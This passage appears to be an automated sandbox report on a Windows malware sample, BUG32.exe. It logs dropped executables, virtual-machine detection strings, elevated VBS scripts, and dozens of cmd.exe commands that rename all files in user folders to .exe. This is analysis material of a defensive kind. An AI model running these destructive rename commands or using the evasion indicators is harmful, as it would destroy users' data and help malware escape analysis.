    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6329227256.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\PALRGUCVEH.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5064077962.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5491630718.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOGJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8995528179.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9329238007.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7155756679.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1058
    Source: C:\Users\user\Desktop\BUG32.exe TID: 4092Thread sleep count: 46 > 30Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AE1754h1_2_00AE1718
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00AE29E2
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00AE2B8C
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: wmplayer.exe, 00000006.00000002.3910361911.0000000008217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
    Source: wmplayer.exe, 00000006.00000002.3910361911.000000000815C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00\
    Source: wmplayer.exe, 00000006.00000002.3910361911.00000000081BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000sGW|
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmp, aJEWGt.exe, 00000001.00000003.2074977882.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, aJEWGt.exe, 00000001.00000002.2637496286.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, aJEWGt.exe, 00000001.00000003.2075106044.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.3910361911.00000000082AA000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.3910361911.000000000827B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: wmplayer.exe, 00000006.00000002.3897677484.0000000002766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP5(
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClassB>e
    Source: wmplayer.exe, 00000006.00000002.3904382162.00000000053A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}x
    Source: wmplayer.exe, 00000006.00000002.3904382162.00000000053A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: wmplayer.exe, 00000006.00000002.3910361911.000000000815C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00er
    Source: wmplayer.exe, 00000006.00000002.3904382162.00000000053A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\BUG32.exeAPI call chain: ExitProcess graph end nodegraph_0-6563
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeAPI call chain: ExitProcess graph end nodegraph_1-1031
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00409881 LoadLibraryA,GetProcAddress,GetVersionExA,0_2_00409881
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_0070F044 mov eax, dword ptr fs:[00000030h]0_2_0070F044
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00407660 SetUnhandledExceptionFilter,0_2_00407660
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00407510 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00407510

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeFile created: ad.exe.3.drJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministratorJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\.ms-ad\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\3D Objects\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Application Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Contacts\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Cookies\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Desktop\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Documents\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Downloads\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Favorites\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Links\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Local Settings\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Music\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\My Documents\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\NetHood\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\OneDrive\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Pictures\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\PrintHood\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Recent\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Saved Games\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Searches\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\SendTo\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Start Menu\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\3D Objects\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Videos\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\LocalLow\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Roaming\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Comms\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\D3DSCache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Google\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\History\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Microsoft\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Mozilla\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\PrintHood\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\PeerDistRepub\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Application Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Publishers\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temp\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temporary Internet Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\VirtualStore\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Searches\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temporary Internet Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Start Menu\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\S\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Comms\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\ConnectedDevicesPlatform\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\D3DSCache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Google\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\History\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Publishers\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\SolidDocuments\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temp\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temporary Internet Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\PrintHood\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Links\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\*.*" "*.exe"Jump to behavior
